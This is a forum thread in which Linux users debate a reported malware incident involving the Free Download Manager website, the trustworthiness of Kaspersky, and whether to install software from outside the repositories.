Password-stealing Linux malware served for 3 years and no one noticed

[rambo919]

Forethought is NOT downloading anything from a software server with an untrustworthy reputation, afterthought is attempting to cover a decision which may compromise your system (e.g., security suite)...common sense only shows in forethought. Think before, not after you click or hit enter!
The idea we can achieve a secure system ignoring the choices made by users on that system or within a domain is guaranteed to fail, integrity and security ends at the moment where such intention deviates, regardless of platform. Too many assume Linux itself as a real-time security suite, therefor they can make questionable choices online (knowingly or unknowingly) and it has no consequence, but the patterns created always expose the painful habit in this mindset, and a collapse in system(s) or domain(s) integrity and security is assured.

This is basically the old folks tsking about the youngens and their dancing....

[argentwolf]

This is basically the old folks tsking about the youngens and their dancing....

No, it's exactly, but it is why our digital world is so compromised these days, across all industries and through all modalities.

[rambo919]

what it is real time security suite? how I can install it on Linux Mint? Is it something like Kasperski internet security suit produced by company which cited article referenced as a source? Is it Kasperski which was strangely not mentioned in security reviews like this one The Best Security Suites for 2023 . Is it company which the US Federal Communications Commission banned for the unacceptable risk to the national security of the United States, forbidding companies from using FCC funds to purchase Kaspersky products.
How the Internet security can be achieved in Kasperski edition? simple - acting like man in the middle, juggling certificates and reading all content before handling it to OS.

Kasperski does on occasion find things that no one else does.... keep in mind it was not one of the other players that found it. If everyone was paying attention it would probably have been found before but generally no one pays attention to Linux binaries nor do they develop products for Linux except on enterprise.... which is not something someone would use something like this for. Ad homonyms wont do anything to deligitimize the legitimate work being done if even by accident. The credibility of kaspersky is besides the point, the point is it's them that found this and now FDM has a credibility problem the same way CCleaner does that they are going to have to work real hard at fixing.... and no one willingly uses CCleaner anymore.

At a minimum a scanner prodding activity in passing with heuristics enabled would have flagged this which would have prodded extra attention. The strange false sense of security people live in by thinking they are not at risk of anything by sticking to walled gardens....is like never going to the doctor so you don't get cancer.

Even if a real time scanner and sandboxer is superfluous.... it only makes you less secure if the provider is doing it. People should stop doing the superiority complex dependency things that people make fun of Mac users for, it gives their arguments no credibility to the point where people outright ignore their self congratulatory ranting about inherent superiority. There is room as a buffer for a light real time malware scanner, it need not take up much resources as some providers have proven. The real problem is Linux generally has problems with not behaving like enterprise and it could easily be done badly in execution, I wont be surprised if someone tries to bake it into systemd at some point.... that's going to be FUN he says in dread.

It does no one any favours to go full "it's actually GNU/Linux" mode when something like this happens. Rather look at the problem, why it happens and how to avoid it.... instead of basically saying "you idiot, you kissed a girl and now she's pregnant and you got AIDS"..... it REALLY does not help anyone.

[t42]

It is not gonna take much imagination - try to be a normal user for the moment which needs do download several files and look, as usual, for the 1st result:

edit: it is not a reply to the comment placed immediately above this one.

[rambo919]

This is basically the old folks tsking about the youngens and their dancing....

No, it's exactly, but it is why our digital world is so compromised these days, across all industries and through all modalities.

Still the same problem, you are over correcting. See my post above.

There are outside of repo programs that never have given anyone any trouble and is not likely to do so. And not all of them are on github.

FreeFileSync for example....sure there is the flatpak version but it's basically useless given the sandboxing.

[rambo919]

It is not gonna take much imagination - try to be a normal user for the moment which needs do download several files and look, as usual, for the 1st result:

It's going to get worse actually, everyone must have noticed by now.... bots are taking over search results and there are not nearly as many search results for any given search anymore..... it's getting weird.

[rambo919]

But to re-oient to the normal user.

If you want a download manager for Linux FDM still probably is the best option.

JDownloader is technically superior but it also has a more advanced workflow and less automation which won't work for most users.

UGET usually has ancient semi-useless versions in the repos and can be flakey.

Persepolis probably still flat out randomly crashes, no clue if they fixed that in mean time.

Both UGET and Persepolis pales in comparison to FDM regarding features.

Anyone that prefers cli downloading wont understand these concerns the same way a CEO does not understand his end users.... bubble separation.

[argentwolf]

superfluous....

Ah! Superfluous, Hypervigilant, and Redundant are my favorite shaming words.

[The Muffin Man]

Literally no one said it's the fault of the OS.... at worst it's the fault of the mentality that real time security suites are useless. You are fighting windmills here.

Thanks for the clarification. For a minute there I thought you were blaming Linux for allowing FDM to steal passwords and calling it Malware.

[t42]

Kasperski does on occasion find things that no one else does....

exactly.

It's still not clear after reading the article what really happened.
1. This topic creates false impression that there was infected FDM application. There was none. FDM was and is a popular application for more than 15 years though currently its usefulness for Linux users is debated.
2. According to Kasperski own article, one of the pages of the FDM website was compromised and on random bases redirected users to the malicious domain, which served downloads of valid FDM copy coupled with malicious script. Exactly the same well-known incident was with Linux Mint website which lead to several downloads of tampered with ISOs.
3. Malicious domain was registered in 2020 by Eliza Heinig organization and is currently inactive.
4. There were no confirmed facts of infection except of several comments which may or may not be caused by the malicious script.
5. Kasperski investigation was unusually pointed mostly back in time and brought out issue after the malicious project was closed. As comments under Arstechnica's article said https://arstechnica.com/security/2023/0 ... comments=1:
"Since it was Kapersky Labs who released this information, I'm also going to add my totally unsupported by definitive facts notion that this was malware developed by those friendly(ish) with Russia, and was already replaced with something more sinister, before Kapersky said anything about it."
If you look at the time frames involved, that's more than enough time to run a targeted attack and keep the lines open to the point the malware has done the job it was intended to do and they can close up the server."
"Is that me being paranoid? Possibly. But in the spy game, anything is possible. And Kapersky has been caught with its hand in that cookie jar one time more than it should have been."

[argentwolf]

Yeah, let's go back 15+ years and I'd argue the binary compromise began when companies allow and suggested BYOD, security intentionally has been a losing afterthought in our digital realm from that point forward, and everyone's been shot blasting at their privacy and whining loudly ever since. Bad Robot!

"What is BYOD (bring your own device)?"
https://www.ibm.com/topics/byod

[rambo919]

"Is that me being paranoid? Possibly. But in the spy game, anything is possible. And Kapersky has been caught with its hand in that cookie jar one time more than it should have been."

The big problem here is the FDM team are admitting to having been caught with their pants down.... or are you accusing Kaspersky of hacking them?

[t42]

The big problem here is the FDM team are admitting to having been caught

So this is a big problem now? What is this topic about?ll?
What is has to do with Linux Mint? There is a norm in Linux and it is up to you to follow it

It is strongly suggested to use a package manager like aptitude or synaptic to download and install packages, instead of doing so manually.

FDM team have no clue what is going on. Just read their appeal to the Kasperski asking to educate them. Clearly they just panicked.

[MurphCID]

Yeah, let's go back 15+ years and I'd argue the binary compromise began when companies allow and suggested BYOD, security intentionally has been a losing afterthought in our digital realm from that point forward, and everyone's been shot blasting at their privacy and whining loudly ever since. Bad Robot!

"What is BYOD (bring your own device)?"
https://www.ibm.com/topics/byod

BYOD is and always has been a bad idea. Now I cannot be a complete hypocrite since I used my personal phone at work, to do work related stuff a lot even though I had been issued an iPhone. It was just "easier". But laptops, and other computers, IMHO, bad idea. We were not allowed to use personal devices for work, ever. The penalties were strict for that. Plus using your own could cost you a court case, which was a "Bad Thing". Still if they knew of the issue, and did not fix it shame on them.

[FDM_Team]

Greetings from the Free Download Manager team! Here is our latest update regarding the issue. We have created a bash script that you can use to check the presence of the malware in your system. Please review our instructions on our official page: https://www.freedownloadmanager.org/blog/?p=664
We once again sincerely apologize for any inconvenience that might have been caused.

[The Muffin Man]

I think "blindly" running bash scripts is the way most malware gets installed. (YMMV)

serenitynow.jpg (22.81 KiB) Viewed 543 times

[rambo919]

I think "blindly" running bash scripts is the way most malware gets installed. (YMMV)
serenitynow.jpg

Do you find anything malicious in the provided script?

[The Muffin Man]

No.
My point (and I do have one) is that if someone relied on FDM for installing software rather than the built-in Debian/Ubuntu/Mint ways, then they'll probably just run the script without examining it, too.

[rambo919]

No.
My point (and I do have one) is that if someone relied on FDM for installing software rather than the built-in Debian/Ubuntu/Mint ways, then they'll probably just run the script without examining it, too.

Given that there exists no real 1:1 alternative in your preferred channels for what FDM does..... is your point not simply ideological slander at this point?

This is not much different from a discord user shaming an IRC user or the other way around. Different people do things in different ways.

However you do have half a point, at least half of FDM users being not highly technically literate wont even know a malicious script if they read one. FDM after all is primarily a normal user friendly solution not an advanced user solution.... and it's more stable and reliable than the normal user friendly solutions in your preferred channels.

The thing here is.... just because you live your digital life inside of FOSS does not mean anyone else does. There exists a great big wild world outside of of the oddly religious FOSS orthodoxy and expecting everyone to live within your preferred walled garden is just plain narrow-minded.... at best you are being a dettol mom here and at worst an elitist snob.... who's snide remarks impress absolutely no one at best actually drive people away from Linux because they really don't want to join another cult. Don't be a bully is good advice for anyone.

I am the annoying figure that see's both FDM and everything other than JDownloader (hardly perfect either) as regressive and restrictive in many ways but I really see no reason to begrudge people their choices. The only real sin of FDM is IMO their obsession with touch interfaces (because it's "modern") that really should have been optional rather than mandatory but there are people that want such applications so more power to them.

Incidentally, downloading something from a browser is a recipe for pain if you have a slow or unstable connection, something that people with fast stable connections forget. It's even more of a pain when you have a long queue of downloads to do.

Lastly.... should people that want to gatekeep Linux to ensure that the normies don't come in and paint the walls or something not stick to using Arch? Just a general thought.

[rambo919]

Greetings from the Free Download Manager team! Here is our latest update regarding the issue. We have created a bash script that you can use to check the presence of the malware in your system. Please review our instructions on our official page: https://www.freedownloadmanager.org/blog/?p=664
We once again sincerely apologize for any inconvenience that might have been caused.

While I don't agree with your philosophy regarding your software, as should be clear by my posts, I for one commend you for your surprising presence here and your humility in the resolution of the problem.

Though I have outgrown it I have in the past found FDM to be very useful to me.